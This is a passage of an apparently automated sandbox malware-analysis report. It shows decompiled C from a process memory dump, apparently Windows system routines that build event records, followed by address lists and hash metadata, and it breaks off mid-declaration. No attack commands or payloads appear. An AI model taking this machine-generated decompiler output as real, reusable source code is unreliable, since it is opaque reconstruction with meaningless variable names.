                                                                                                            								 *(_t528 - 0xa4) = _t306;
                                                                                                            								__eflags =  *0x11560e8;
                                                                                                            								if( *0x11560e8 != 0) {
                                                                                                            									__eflags = _t306 - 0x40;
                                                                                                            									if(_t306 < 0x40) {
                                                                                                            										L20:
                                                                                                            										asm("lock inc dword [eax]");
                                                                                                            										_t310 =  *0x11560e8; // 0x0
                                                                                                            										_t311 =  *(_t310 +  *(_t528 - 0xa4) * 8);
                                                                                                            										__eflags = _t311 & 0x00000001;
                                                                                                            										if((_t311 & 0x00000001) == 0) {
                                                                                                            											 *(_t528 - 0xa0) = _t311;
                                                                                                            											_t475 = _t427;
                                                                                                            											 *(_t528 - 0x74) = _t427;
                                                                                                            											__eflags = _t475;
                                                                                                            											if(_t475 != 0) {
                                                                                                            												L91:
                                                                                                            												_t474 =  *((intOrPtr*)(_t528 - 0x94));
                                                                                                            												goto L92;
                                                                                                            											}
                                                                                                            											asm("sbb edi, edi");
                                                                                                            											_t498 = ( ~( *(_t528 + 0x18)) & _t511) + 0x50;
                                                                                                            											_t511 = _t498;
                                                                                                            											_t312 =  *((intOrPtr*)(_t528 - 0x94));
                                                                                                            											__eflags =  *(_t312 - 5) & 1;
                                                                                                            											if(( *(_t312 - 5) & 1) != 0) {
                                                                                                            												_push(_t528 - 0x98);
                                                                                                            												_push(0x4c);
                                                                                                            												_push(_t528 - 0x70);
                                                                                                            												_push(1);
                                                                                                            												_push(0xfffffffa);
                                                                                                            												_t412 = E010A9710();
                                                                                                            												_t475 = _t427;
                                                                                                            												__eflags = _t412;
                                                                                                            												if(_t412 >= 0) {
                                                                                                            													_t414 =  *(_t528 - 0x98) - 8;
                                                                                                            													 *(_t528 - 0x98) = _t414;
                                                                                                            													_t416 = _t414 + 0x0000000f & 0x0000fff8;
                                                                                                            													 *(_t528 - 0x8c) = _t416;
                                                                                                            													 *(_t528 - 0x79) = 1;
                                                                                                            													_t511 = (_t416 & 0x0000ffff) + _t498;
                                                                                                            													__eflags = _t511;
                                                                                                            												}
                                                                                                            											}
                                                                                                            											_t446 =  *( *((intOrPtr*)(_t528 - 0x94)) - 5);
                                                                                                            											__eflags = _t446 & 0x00000004;
                                                                                                            											if((_t446 & 0x00000004) != 0) {
                                                                                                            												__eflags =  *(_t528 - 0x9c);
                                                                                                            												if( *(_t528 - 0x9c) != 0) {
                                                                                                            													 *(_t528 - 0x7a) = 1;
                                                                                                            													_t511 = _t511 + ( *(_t528 - 0x84) & 0x0000ffff);
                                                                                                            													__eflags = _t511;
                                                                                                            												}
                                                                                                            											}
                                                                                                            											_t313 = 2;
                                                                                                            											_t447 = _t446 & _t313;
                                                                                                            											__eflags = _t447;
                                                                                                            											 *(_t528 - 0xd4) = _t447;
                                                                                                            											if(_t447 != 0) {
                                                                                                            												_t406 = 0x10;
                                                                                                            												_t511 = _t511 + _t406;
                                                                                                            												__eflags = _t511;
                                                                                                            											}
                                                                                                            											_t494 = ( *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) << 4) +  *((intOrPtr*)(_t528 - 0xc4));
                                                                                                            											 *(_t528 - 0x88) = _t427;
                                                                                                            											__eflags =  *(_t528 + 0x1c);
                                                                                                            											if( *(_t528 + 0x1c) <= 0) {
                                                                                                            												L45:
                                                                                                            												__eflags =  *(_t528 - 0xb0);
                                                                                                            												if( *(_t528 - 0xb0) != 0) {
                                                                                                            													_t511 = _t511 + (( *(_t528 - 0x90) & 0x0000ffff) + 0x0000000f & 0xfffffff8);
                                                                                                            													__eflags = _t511;
                                                                                                            												}
                                                                                                            												__eflags = _t475;
                                                                                                            												if(_t475 != 0) {
                                                                                                            													asm("lock dec dword [ecx+edx*8+0x4]");
                                                                                                            													goto L100;
                                                                                                            												} else {
                                                                                                            													_t494[3] = _t511;
                                                                                                            													_t451 =  *(_t528 - 0xa0);
                                                                                                            													_t427 = E010A6DE6(_t451, _t511,  *( *[fs:0x18] + 0xf77) & 0x000000ff, _t528 - 0xe0, _t528 - 0xbc);
                                                                                                            													 *(_t528 - 0x88) = _t427;
                                                                                                            													__eflags = _t427;
                                                                                                            													if(_t427 == 0) {
                                                                                                            														__eflags = _t511 - 0xfff8;
                                                                                                            														if(_t511 <= 0xfff8) {
                                                                                                            															__eflags =  *((intOrPtr*)( *(_t528 - 0xa0) + 0x90)) - _t511;
                                                                                                            															asm("sbb ecx, ecx");
                                                                                                            															__eflags = (_t451 & 0x000000e2) + 8;
                                                                                                            														}
                                                                                                            														asm("lock dec dword [eax+edx*8+0x4]");
                                                                                                            														L100:
                                                                                                            														goto L101;
                                                                                                            													}
                                                                                                            													_t453 =  *(_t528 - 0xa0);
                                                                                                            													 *_t494 = _t453;
                                                                                                            													_t494[1] = _t427;
                                                                                                            													_t494[2] =  *(_t528 - 0xbc);
                                                                                                            													 *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) =  *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) + 1;
                                                                                                            													 *_t427 =  *(_t453 + 0x24) | _t511;
                                                                                                            													 *(_t427 + 4) =  *((intOrPtr*)(_t528 + 0x10));
                                                                                                            													 *((short*)(_t427 + 6)) =  *((intOrPtr*)(_t528 + 8));
                                                                                                            													asm("movsd");
                                                                                                            													asm("movsd");
                                                                                                            													asm("movsd");
                                                                                                            													asm("movsd");
                                                                                                            													asm("movsd");
                                                                                                            													asm("movsd");
                                                                                                            													asm("movsd");
                                                                                                            													asm("movsd");
                                                                                                            													__eflags =  *(_t528 + 0x14);
                                                                                                            													if( *(_t528 + 0x14) == 0) {
                                                                                                            														__eflags =  *[fs:0x18] + 0xf50;
                                                                                                            													}
                                                                                                            													asm("movsd");
                                                                                                            													asm("movsd");
                                                                                                            													asm("movsd");
                                                                                                            													asm("movsd");
                                                                                                            													__eflags =  *(_t528 + 0x18);
                                                                                                            													if( *(_t528 + 0x18) == 0) {
                                                                                                            														_t454 =  *(_t528 - 0x80);
                                                                                                            														_t479 =  *(_t528 - 0x78);
                                                                                                            														_t327 = 1;
                                                                                                            														__eflags = 1;
                                                                                                            													} else {
                                                                                                            														_t146 = _t427 + 0x50; // 0x50
                                                                                                            														_t454 = _t146;
                                                                                                            														 *(_t528 - 0x80) = _t454;
                                                                                                            														_t382 = 0x18;
                                                                                                            														 *_t454 = _t382;
                                                                                                            														 *((short*)(_t454 + 2)) = 1;
                                                                                                            														_t385 = 0x10;
                                                                                                            														 *((short*)(_t454 + 6)) = _t385;
                                                                                                            														 *(_t454 + 4) = 0;
                                                                                                            														asm("movsd");
                                                                                                            														asm("movsd");
                                                                                                            														asm("movsd");
                                                                                                            														asm("movsd");
                                                                                                            														_t327 = 1;
                                                                                                            														 *(_t427 + 4) =  *(_t427 + 4) | 1;
                                                                                                            														_t479 = 0x68;
                                                                                                            														 *(_t528 - 0x78) = _t479;
                                                                                                            													}
                                                                                                            													__eflags =  *(_t528 - 0x79) - _t327;
                                                                                                            													if( *(_t528 - 0x79) == _t327) {
                                                                                                            														_t524 = _t479 + _t427;
                                                                                                            														_t508 =  *(_t528 - 0x8c);
                                                                                                            														 *_t524 = _t508;
                                                                                                            														_t373 = 2;
                                                                                                            														 *((short*)(_t524 + 2)) = _t373;
                                                                                                            														 *((short*)(_t524 + 6)) =  *(_t528 - 0x98);
                                                                                                            														 *((short*)(_t524 + 4)) = 0;
                                                                                                            														_t167 = _t524 + 8; // 0x8
                                                                                                            														E010AF3E0(_t167, _t528 - 0x68,  *(_t528 - 0x98));
                                                                                                            														_t529 = _t529 + 0xc;
                                                                                                            														 *(_t427 + 4) =  *(_t427 + 4) | 1;
                                                                                                            														_t479 =  *(_t528 - 0x78) + (_t508 & 0x0000ffff);
                                                                                                            														 *(_t528 - 0x78) = _t479;
                                                                                                            														_t380 =  *(_t528 - 0x80);
                                                                                                            														__eflags = _t380;
                                                                                                            														if(_t380 != 0) {
                                                                                                            															_t173 = _t380 + 4;
                                                                                                            															 *_t173 =  *(_t380 + 4) | 1;
                                                                                                            															__eflags =  *_t173;
                                                                                                            														}
                                                                                                            														_t454 = _t524;
                                                                                                            														 *(_t528 - 0x80) = _t454;
                                                                                                            														_t327 = 1;
                                                                                                            														__eflags = 1;
                                                                                                            													}
                                                                                                            													__eflags =  *(_t528 - 0xd4);
                                                                                                            													if( *(_t528 - 0xd4) == 0) {
                                                                                                            														_t505 =  *(_t528 - 0x80);
                                                                                                            													} else {
                                                                                                            														_t505 = _t479 + _t427;
                                                                                                            														_t523 = 0x10;
                                                                                                            														 *_t505 = _t523;
                                                                                                            														_t367 = 3;
                                                                                                            														 *((short*)(_t505 + 2)) = _t367;
                                                                                                            														_t368 = 4;
                                                                                                            														 *((short*)(_t505 + 6)) = _t368;
                                                                                                            														 *(_t505 + 4) = 0;
                                                                                                            														 *((intOrPtr*)(_t505 + 8)) =  *((intOrPtr*)( *[fs:0x30] + 0x1d4));
                                                                                                            														_t327 = 1;
                                                                                                            														 *(_t427 + 4) =  *(_t427 + 4) | 1;
                                                                                                            														_t479 = _t479 + _t523;
                                                                                                            														 *(_t528 - 0x78) = _t479;
                                                                                                            														__eflags = _t454;
                                                                                                            														if(_t454 != 0) {
                                                                                                            															_t186 = _t454 + 4;
                                                                                                            															 *_t186 =  *(_t454 + 4) | 1;
                                                                                                            															__eflags =  *_t186;
                                                                                                            														}
                                                                                                            														 *(_t528 - 0x80) = _t505;
                                                                                                            													}
                                                                                                            													__eflags =  *(_t528 - 0x7a) - _t327;
                                                                                                            													if( *(_t528 - 0x7a) == _t327) {
                                                                                                            														 *(_t528 - 0xd4) = _t479 + _t427;
                                                                                                            														_t522 =  *(_t528 - 0x84) & 0x0000ffff;
                                                                                                            														E010AF3E0(_t479 + _t427,  *(_t528 - 0x9c), _t522);
                                                                                                            														_t529 = _t529 + 0xc;
                                                                                                            														 *(_t427 + 4) =  *(_t427 + 4) | 1;
                                                                                                            														_t479 =  *(_t528 - 0x78) + _t522;
                                                                                                            														 *(_t528 - 0x78) = _t479;
                                                                                                            														__eflags = _t505;
                                                                                                            														if(_t505 != 0) {
                                                                                                            															_t199 = _t505 + 4;
                                                                                                            															 *_t199 =  *(_t505 + 4) | 1;
                                                                                                            															__eflags =  *_t199;
                                                                                                            														}
                                                                                                            														_t505 =  *(_t528 - 0xd4);
                                                                                                            														 *(_t528 - 0x80) = _t505;
                                                                                                            													}
                                                                                                            													__eflags =  *(_t528 - 0xa8);
                                                                                                            													if( *(_t528 - 0xa8) != 0) {
                                                                                                            														_t356 = _t479 + _t427;
                                                                                                            														 *(_t528 - 0xd4) = _t356;
                                                                                                            														_t462 =  *(_t528 - 0xac);
                                                                                                            														 *_t356 = _t462 + 0x0000000f & 0x0000fff8;
                                                                                                            														_t485 = 0xc;
                                                                                                            														 *((short*)(_t356 + 2)) = _t485;
                                                                                                            														 *(_t356 + 6) = _t462;
                                                                                                            														 *((short*)(_t356 + 4)) = 0;
                                                                                                            														_t211 = _t356 + 8; // 0x9
                                                                                                            														E010AF3E0(_t211,  *(_t528 - 0xa8), _t462 & 0x0000ffff);
                                                                                                            														E010AFA60((_t462 & 0x0000ffff) + _t211, 0, (_t462 + 0x0000000f & 0x0000fff8) -  *(_t528 - 0xac) - 0x00000008 & 0x0000ffff);
                                                                                                            														_t529 = _t529 + 0x18;
                                                                                                            														_t427 =  *(_t528 - 0x88);
                                                                                                            														 *(_t427 + 4) =  *(_t427 + 4) | 1;
                                                                                                            														_t505 =  *(_t528 - 0xd4);
                                                                                                            														_t479 =  *(_t528 - 0x78) + ( *_t505 & 0x0000ffff);
                                                                                                            														 *(_t528 - 0x78) = _t479;
                                                                                                            														_t362 =  *(_t528 - 0x80);
                                                                                                            														__eflags = _t362;
                                                                                                            														if(_t362 != 0) {
                                                                                                            															_t222 = _t362 + 4;
                                                                                                            															 *_t222 =  *(_t362 + 4) | 1;
                                                                                                            															__eflags =  *_t222;
                                                                                                            														}
                                                                                                            													}
                                                                                                            													__eflags =  *(_t528 - 0xb0);
                                                                                                            													if( *(_t528 - 0xb0) != 0) {
                                                                                                            														 *(_t479 + _t427) =  *(_t528 - 0x90) + 0x0000000f & 0x0000fff8;
                                                                                                            														_t458 = 0xb;
                                                                                                            														 *((short*)(_t479 + _t427 + 2)) = _t458;
                                                                                                            														 *((short*)(_t479 + _t427 + 6)) =  *(_t528 - 0x90);
                                                                                                            														 *((short*)(_t427 + 4 + _t479)) = 0;
                                                                                                            														 *(_t528 - 0xb8) = _t479 + 8 + _t427;
                                                                                                            														E010AFA60(( *(_t528 - 0x90) & 0x0000ffff) + _t479 + 8 + _t427, 0, ( *(_t528 - 0x90) + 0x0000000f & 0x0000fff8) -  *(_t528 - 0x90) - 0x00000008 & 0x0000ffff);
                                                                                                            														_t529 = _t529 + 0xc;
                                                                                                            														 *(_t427 + 4) =  *(_t427 + 4) | 1;
                                                                                                            														_t479 =  *(_t528 - 0x78) + ( *( *(_t528 - 0x78) + _t427) & 0x0000ffff);
                                                                                                            														 *(_t528 - 0x78) = _t479;
                                                                                                            														__eflags = _t505;
                                                                                                            														if(_t505 != 0) {
                                                                                                            															_t241 = _t505 + 4;
                                                                                                            															 *_t241 =  *(_t505 + 4) | 1;
                                                                                                            															__eflags =  *_t241;
                                                                                                            														}
                                                                                                            													}
                                                                                                            													_t328 =  *(_t528 + 0x1c);
                                                                                                            													__eflags = _t328;
                                                                                                            													if(_t328 == 0) {
                                                                                                            														L87:
                                                                                                            														_t329 =  *((intOrPtr*)(_t528 - 0xe0));
                                                                                                            														 *((intOrPtr*)(_t427 + 0x10)) = _t329;
                                                                                                            														_t455 =  *(_t528 - 0xdc);
                                                                                                            														 *(_t427 + 0x14) = _t455;
                                                                                                            														_t480 =  *(_t528 - 0xa0);
                                                                                                            														_t517 = 3;
                                                                                                            														__eflags =  *((intOrPtr*)(_t480 + 0x10)) - _t517;
                                                                                                            														if( *((intOrPtr*)(_t480 + 0x10)) != _t517) {
                                                                                                            															asm("rdtsc");
                                                                                                            															 *(_t427 + 0x3c) = _t480;
                                                                                                            														} else {
                                                                                                            															 *(_t427 + 0x3c) = _t455;
                                                                                                            														}
                                                                                                            														 *((intOrPtr*)(_t427 + 0x38)) = _t329;
                                                                                                            														_t456 =  *[fs:0x18];
                                                                                                            														 *((intOrPtr*)(_t427 + 8)) =  *((intOrPtr*)(_t456 + 0x24));
                                                                                                            														 *((intOrPtr*)(_t427 + 0xc)) =  *((intOrPtr*)(_t456 + 0x20));
                                                                                                            														_t427 = 0;
                                                                                                            														__eflags = 0;
                                                                                                            														_t511 = 0x18;
                                                                                                            														goto L91;
                                                                                                            													} else {
                                                                                                            														_t519 =  *((intOrPtr*)(_t528 - 0xc8)) + 0xc;
                                                                                                            														__eflags = _t519;
                                                                                                            														 *(_t528 - 0x8c) = _t328;
                                                                                                            														do {
                                                                                                            															_t506 =  *((intOrPtr*)(_t519 - 4));
                                                                                                            															_t457 =  *((intOrPtr*)(_t519 - 0xc));
                                                                                                            															 *(_t528 - 0xd4) =  *(_t519 - 8);
                                                                                                            															_t333 =  *((intOrPtr*)(_t528 - 0xb4));
                                                                                                            															__eflags =  *(_t333 + 0x36) & 0x00004000;
                                                                                                            															if(( *(_t333 + 0x36) & 0x00004000) != 0) {
                                                                                                            																_t334 =  *_t519;
                                                                                                            															} else {
                                                                                                            																_t334 = 0;
                                                                                                            															}
                                                                                                            															_t336 = _t334 & 0x000000ff;
                                                                                                            															__eflags = _t336;
                                                                                                            															_t427 =  *(_t528 - 0x88);
                                                                                                            															if(_t336 == 0) {
                                                                                                            																_t481 = _t479 + _t506;
                                                                                                            																__eflags = _t481;
                                                                                                            																 *(_t528 - 0x78) = _t481;
                                                                                                            																E010AF3E0(_t479 + _t427, _t457, _t506);
                                                                                                            																_t529 = _t529 + 0xc;
                                                                                                            															} else {
                                                                                                            																_t340 = _t336 - 1;
                                                                                                            																__eflags = _t340;
                                                                                                            																if(_t340 == 0) {
                                                                                                            																	E010AF3E0( *(_t528 - 0xb8), _t457, _t506);
                                                                                                            																	_t529 = _t529 + 0xc;
                                                                                                            																	 *(_t528 - 0xb8) =  *(_t528 - 0xb8) + _t506;
                                                                                                            																} else {
                                                                                                            																	__eflags = _t340 == 0;
                                                                                                            																	if(_t340 == 0) {
                                                                                                            																		__eflags = _t506 - 8;
                                                                                                            																		if(_t506 == 8) {
                                                                                                            																			 *((intOrPtr*)(_t528 - 0xe0)) =  *_t457;
                                                                                                            																			 *(_t528 - 0xdc) =  *(_t457 + 4);
                                                                                                            																		}
                                                                                                            																	}
                                                                                                            																}
                                                                                                            															}
                                                                                                            															_t339 = 0x10;
                                                                                                            															_t519 = _t519 + _t339;
                                                                                                            															_t263 = _t528 - 0x8c;
                                                                                                            															 *_t263 =  *(_t528 - 0x8c) - 1;
                                                                                                            															__eflags =  *_t263;
                                                                                                            															_t479 =  *(_t528 - 0x78);
                                                                                                            														} while ( *_t263 != 0);
                                                                                                            														goto L87;
                                                                                                            													}
                                                                                                            												}
                                                                                                            											} else {
                                                                                                            												_t392 =  *( *((intOrPtr*)(_t528 - 0xb4)) + 0x36) & 0x00004000;
                                                                                                            												 *(_t528 - 0xa2) = _t392;
                                                                                                            												_t469 =  *((intOrPtr*)(_t528 - 0xc8)) + 8;
                                                                                                            												__eflags = _t469;
                                                                                                            												while(1) {
                                                                                                            													 *(_t528 - 0xe4) = _t511;
                                                                                                            													__eflags = _t392;
                                                                                                            													_t393 = _t427;
                                                                                                            													if(_t392 != 0) {
                                                                                                            														_t393 =  *((intOrPtr*)(_t469 + 4));
                                                                                                            													}
                                                                                                            													_t395 = (_t393 & 0x000000ff) - _t427;
                                                                                                            													__eflags = _t395;
                                                                                                            													if(_t395 == 0) {
                                                                                                            														_t511 = _t511 +  *_t469;
                                                                                                            														__eflags = _t511;
                                                                                                            													} else {
                                                                                                            														_t398 = _t395 - 1;
                                                                                                            														__eflags = _t398;
                                                                                                            														if(_t398 == 0) {
                                                                                                            															 *(_t528 - 0x90) =  *(_t528 - 0x90) +  *_t469;
                                                                                                            															 *(_t528 - 0xb0) =  *(_t528 - 0xb0) + 1;
                                                                                                            														} else {
                                                                                                            															__eflags = _t398 == 1;
                                                                                                            															if(_t398 == 1) {
                                                                                                            																 *(_t528 - 0xa8) =  *(_t469 - 8);
                                                                                                            																_t402 =  *_t469 & 0x0000ffff;
                                                                                                            																 *(_t528 - 0xac) = _t402;
                                                                                                            																_t511 = _t511 + ((_t402 & 0x0000ffff) + 0x0000000f & 0xfffffff8);
                                                                                                            															}
                                                                                                            														}
                                                                                                            													}
                                                                                                            													__eflags = _t511 -  *(_t528 - 0xe4);
                                                                                                            													if(_t511 <  *(_t528 - 0xe4)) {
                                                                                                            														break;
                                                                                                            													}
                                                                                                            													_t397 =  *(_t528 - 0x88) + 1;
                                                                                                            													 *(_t528 - 0x88) = _t397;
                                                                                                            													_t469 = _t469 + 0x10;
                                                                                                            													__eflags = _t397 -  *(_t528 + 0x1c);
                                                                                                            													_t392 =  *(_t528 - 0xa2);
                                                                                                            													if(_t397 <  *(_t528 + 0x1c)) {
                                                                                                            														continue;
                                                                                                            													}
                                                                                                            													goto L45;
                                                                                                            												}
                                                                                                            												_t475 = 0x216;
                                                                                                            												 *(_t528 - 0x74) = 0x216;
                                                                                                            												goto L45;
                                                                                                            											}
                                                                                                            										} else {
                                                                                                            											asm("lock dec dword [eax+ecx*8+0x4]");
                                                                                                            											goto L16;
                                                                                                            										}
                                                                                                            									}
                                                                                                            									_t491 = E01134CAB(_t306, _t528 - 0xa4);
                                                                                                            									 *(_t528 - 0x74) = _t491;
                                                                                                            									__eflags = _t491;
                                                                                                            									if(_t491 != 0) {
                                                                                                            										goto L91;
                                                                                                            									} else {
                                                                                                            										_t474 =  *((intOrPtr*)(_t528 - 0x94));
                                                                                                            										goto L20;
                                                                                                            									}
                                                                                                            								}
                                                                                                            								L16:
                                                                                                            								 *(_t528 - 0x74) = 0x1069;
                                                                                                            								L93:
                                                                                                            								_t298 =  *(_t528 - 0xd0) + 1;
                                                                                                            								 *(_t528 - 0xd0) = _t298;
                                                                                                            								_t474 = _t474 + _t511;
                                                                                                            								 *((intOrPtr*)(_t528 - 0x94)) = _t474;
                                                                                                            								_t494 = 4;
                                                                                                            								__eflags = _t298 - _t494;
                                                                                                            								if(_t298 >= _t494) {
                                                                                                            									goto L100;
                                                                                                            								}
                                                                                                            								_t494 =  *(_t528 - 0xcc);
                                                                                                            								_t435 = _t298;
                                                                                                            								continue;
                                                                                                            							}
                                                                                                            							__eflags = _t494[2] | _t494[3];
                                                                                                            							if((_t494[2] | _t494[3]) == 0) {
                                                                                                            								goto L15;
                                                                                                            							}
                                                                                                            							goto L12;
                                                                                                            						}
                                                                                                            						__eflags = _t301;
                                                                                                            						if(_t301 != 0) {
                                                                                                            							goto L92;
                                                                                                            						}
                                                                                                            						goto L10;
                                                                                                            						L92:
                                                                                                            						goto L93;
                                                                                                            					}
                                                                                                            				} else {
                                                                                                            					_push(0x57);
                                                                                                            					L101:
                                                                                                            					return E010BD130(_t427, _t494, _t511);
                                                                                                            				}
                                                                                                            			}










































































                                                                                                            0x00000000
                                                                                                            0x01135f70
                                                                                                            0x01135f70
                                                                                                            0x01135f91
                                                                                                            0x01135f9c
                                                                                                            0x01135f9e
                                                                                                            0x01135fa4
                                                                                                            0x01135fa6
                                                                                                            0x0113638c
                                                                                                            0x01136392
                                                                                                            0x011363a1
                                                                                                            0x011363a7
                                                                                                            0x011363af
                                                                                                            0x011363af
                                                                                                            0x011363bd
                                                                                                            0x011363d8
                                                                                                            0x00000000
                                                                                                            0x011363d8
                                                                                                            0x01135fac
                                                                                                            0x01135fb2
                                                                                                            0x01135fb4
                                                                                                            0x01135fbd
                                                                                                            0x01135fc6
                                                                                                            0x01135fce
                                                                                                            0x01135fd4
                                                                                                            0x01135fdc
                                                                                                            0x01135fec
                                                                                                            0x01135fed
                                                                                                            0x01135fee
                                                                                                            0x01135fef
                                                                                                            0x01135ff9
                                                                                                            0x01135ffa
                                                                                                            0x01135ffb
                                                                                                            0x01135ffc
                                                                                                            0x01136000
                                                                                                            0x01136004
                                                                                                            0x01136012
                                                                                                            0x01136012
                                                                                                            0x01136018
                                                                                                            0x01136019
                                                                                                            0x0113601a
                                                                                                            0x0113601b
                                                                                                            0x0113601c
                                                                                                            0x01136020
                                                                                                            0x01136059
                                                                                                            0x0113605c
                                                                                                            0x01136061
                                                                                                            0x01136061
                                                                                                            0x01136022
                                                                                                            0x01136022
                                                                                                            0x01136022
                                                                                                            0x01136025
                                                                                                            0x0113602a
                                                                                                            0x0113602b
                                                                                                            0x01136031
                                                                                                            0x01136037
                                                                                                            0x01136038
                                                                                                            0x0113603e
                                                                                                            0x01136048
                                                                                                            0x01136049
                                                                                                            0x0113604a
                                                                                                            0x0113604b
                                                                                                            0x0113604c
                                                                                                            0x0113604d
                                                                                                            0x01136053
                                                                                                            0x01136054
                                                                                                            0x01136054
                                                                                                            0x01136062
                                                                                                            0x01136065
                                                                                                            0x01136067
                                                                                                            0x0113606a
                                                                                                            0x01136070
                                                                                                            0x01136075
                                                                                                            0x01136076
                                                                                                            0x01136081
                                                                                                            0x01136087
                                                                                                            0x01136095
                                                                                                            0x01136099
                                                                                                            0x0113609e
                                                                                                            0x011360a4
                                                                                                            0x011360ae
                                                                                                            0x011360b0
                                                                                                            0x011360b3
                                                                                                            0x011360b6
                                                                                                            0x011360b8
                                                                                                            0x011360ba
                                                                                                            0x011360ba
                                                                                                            0x011360ba
                                                                                                            0x011360ba
                                                                                                            0x011360be
                                                                                                            0x011360c0
                                                                                                            0x011360c5
                                                                                                            0x011360c5
                                                                                                            0x011360c5
                                                                                                            0x011360c6
                                                                                                            0x011360cd
                                                                                                            0x01136114
                                                                                                            0x011360cf
                                                                                                            0x011360cf
                                                                                                            0x011360d4
                                                                                                            0x011360d5
                                                                                                            0x011360da
                                                                                                            0x011360db
                                                                                                            0x011360e1
                                                                                                            0x011360e2
                                                                                                            0x011360e8
                                                                                                            0x011360f8
                                                                                                            0x011360fd
                                                                                                            0x011360fe
                                                                                                            0x01136102
                                                                                                            0x01136104
                                                                                                            0x01136107
                                                                                                            0x01136109
                                                                                                            0x0113610b
                                                                                                            0x0113610b
                                                                                                            0x0113610b
                                                                                                            0x0113610b
                                                                                                            0x0113610f
                                                                                                            0x0113610f
                                                                                                            0x01136117
                                                                                                            0x0113611a
                                                                                                            0x0113611f
                                                                                                            0x01136125
                                                                                                            0x01136134
                                                                                                            0x01136139
                                                                                                            0x0113613f
                                                                                                            0x01136146
                                                                                                            0x01136148
                                                                                                            0x0113614b
                                                                                                            0x0113614d
                                                                                                            0x0113614f
                                                                                                            0x0113614f
                                                                                                            0x0113614f
                                                                                                            0x0113614f
                                                                                                            0x01136153
                                                                                                            0x01136159
                                                                                                            0x01136159
                                                                                                            0x0113615c
                                                                                                            0x01136163
                                                                                                            0x01136169
                                                                                                            0x0113616c
                                                                                                            0x01136172
                                                                                                            0x01136181
                                                                                                            0x01136186
                                                                                                            0x01136187
                                                                                                            0x0113618b
                                                                                                            0x01136191
                                                                                                            0x01136195
                                                                                                            0x011361a3
                                                                                                            0x011361bb
                                                                                                            0x011361c0
                                                                                                            0x011361c3
                                                                                                            0x011361cc
                                                                                                            0x011361d0
                                                                                                            0x011361dc
                                                                                                            0x011361de
                                                                                                            0x011361e1
                                                                                                            0x011361e4
                                                                                                            0x011361e6
                                                                                                            0x011361e8
                                                                                                            0x011361e8
                                                                                                            0x011361e8
                                                                                                            0x011361e8
                                                                                                            0x011361e6
                                                                                                            0x011361ec
                                                                                                            0x011361f3
                                                                                                            0x01136203
                                                                                                            0x01136209
                                                                                                            0x0113620a
                                                                                                            0x01136216
                                                                                                            0x0113621d
                                                                                                            0x01136227
                                                                                                            0x01136241
                                                                                                            0x01136246
                                                                                                            0x0113624c
                                                                                                            0x01136257
                                                                                                            0x01136259
                                                                                                            0x0113625c
                                                                                                            0x0113625e
                                                                                                            0x01136260
                                                                                                            0x01136260
                                                                                                            0x01136260
                                                                                                            0x01136260
                                                                                                            0x0113625e
                                                                                                            0x01136264
                                                                                                            0x01136267
                                                                                                            0x01136269
                                                                                                            0x01136315
                                                                                                            0x01136315
                                                                                                            0x0113631b
                                                                                                            0x0113631e
                                                                                                            0x01136324
                                                                                                            0x01136327
                                                                                                            0x0113632f
                                                                                                            0x01136330
                                                                                                            0x01136333
                                                                                                            0x0113633a
                                                                                                            0x0113633c
                                                                                                            0x01136335
                                                                                                            0x01136335
                                                                                                            0x01136335
                                                                                                            0x0113633f
                                                                                                            0x01136342
                                                                                                            0x0113634c
                                                                                                            0x01136352
                                                                                                            0x01136355
                                                                                                            0x01136355
                                                                                                            0x01136359
                                                                                                            0x00000000
                                                                                                            0x0113626f
                                                                                                            0x01136275
                                                                                                            0x01136275
                                                                                                            0x01136278
                                                                                                            0x0113627e
                                                                                                            0x0113627e
                                                                                                            0x01136281
                                                                                                            0x01136287
                                                                                                            0x0113628d
                                                                                                            0x01136298
                                                                                                            0x0113629c
                                                                                                            0x011362a2
                                                                                                            0x0113629e
                                                                                                            0x0113629e
                                                                                                            0x0113629e
                                                                                                            0x011362a7
                                                                                                            0x011362a7
                                                                                                            0x011362aa
                                                                                                            0x011362b0
                                                                                                            0x011362f0
                                                                                                            0x011362f0
                                                                                                            0x011362f2
                                                                                                            0x011362f8
                                                                                                            0x011362fd
                                                                                                            0x011362b2
                                                                                                            0x011362b2

                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.358500037.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_1040000_TT copy.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 6b14ab649cad727db4a7804adab723f5c9d47f3455fb505db674f51174a347ff
                                                                                                            • Instruction ID: 6a6fbd8a195455baf80e571b92b87deaf9647a584881ebddca9986d782c2eba0
                                                                                                            • Opcode Fuzzy Hash: 6b14ab649cad727db4a7804adab723f5c9d47f3455fb505db674f51174a347ff
                                                                                                            • Instruction Fuzzy Hash: 4D427C71900229DFDB68CF68C880BA9BBB1FF85704F1581AAD94DEB246D7349A85CF50
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 92%
                                                                                                            			E01084120(signed char __ecx, signed short* __edx, signed short* _a4, signed int _a8, signed short* _a12, signed short* _a16, signed short _a20) {
                                                                                                            				signed int _v8;
                                                                                                            				void* _v20;
                                                                                                            				signed int _v24;
                                                                                                            				char _v532;
                                                                                                            				char _v540;
                                                                                                            				signed short _v544;
                                                                                                            				signed int _v548;
                                                                                                            				signed short* _v552;
                                                                                                            				signed short _v556;
                                                                                                            				signed short* _v560;
                                                                                                            				signed short* _v564;
                                                                                                            				signed short* _v568;
                                                                                                            				void* _v570;
                                                                                                            				signed short* _v572;
                                                                                                            				signed short _v576;
                                                                                                            				signed int _v580;
                                                                                                            				char _v581;
                                                                                                            				void* _v584;
                                                                                                            				unsigned int _v588;
                                                                                                            				signed short* _v592;
                                                                                                            				void* _v597;
                                                                                                            				void* _v600;
                                                                                                            				void* _v604;
                                                                                                            				void* _v609;
                                                                                                            				void* _v616;
                                                                                                            				void* __ebx;
                                                                                                            				void* __edi;
                                                                                                            				void* __esi;
                                                                                                            				unsigned int _t161;
                                                                                                            				signed int _t162;
                                                                                                            				unsigned int _t163;
                                                                                                            				void* _t169;
                                                                                                            				signed short _t173;
                                                                                                            				signed short _t177;
                                                                                                            				signed short _t181;
                                                                                                            				unsigned int _t182;
                                                                                                            				signed int _t185;
